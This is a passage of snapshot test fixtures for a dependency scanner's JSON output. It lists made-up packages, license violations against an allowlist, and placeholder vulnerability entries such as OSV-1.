"MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT", "Apache-2.0" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "NuGet" }, "licenses": [ "ISC" ] }, { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "dependency_groups": [ "dev" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "build" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/no_sources - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "UNKNOWN" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT", "Apache-2.0" ], "license_violations": [ "MIT", "Apache-2.0" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abc123" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abc123" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "7.8" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "experimental_analysis": { "OSV-2": { "called": true, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abcxzy" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "results": [ { "source": { "path": "/path/to/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "deprecated-pkg", "version": "1.0.0", "ecosystem": "npm", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" } }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" } }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" } } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" } }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "4.3" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "experimental_analysis": { "OSV-5": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "1.2.2", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "experimental_analysis": { "OSV-3": { "called": true, "unimportant": false } }, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist", "commit": "123abc" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] }, { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abcxyz" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "NuGet" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" } ] }, { "package": { "name": "author3/mine3", "version": "0.4.1", "ecosystem": "Packagist" }, "dependency_groups": [ "build" ], "groups": [ { "ids": [ "OSV-3" ], "aliases": null, "max_severity": "" }, { "ids": [ "OSV-5" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-3", "severity": [ { "score": "1" } ], "summary": "Something mildly scary!" }, { "id": "OSV-5", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/no_sources - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] } ], 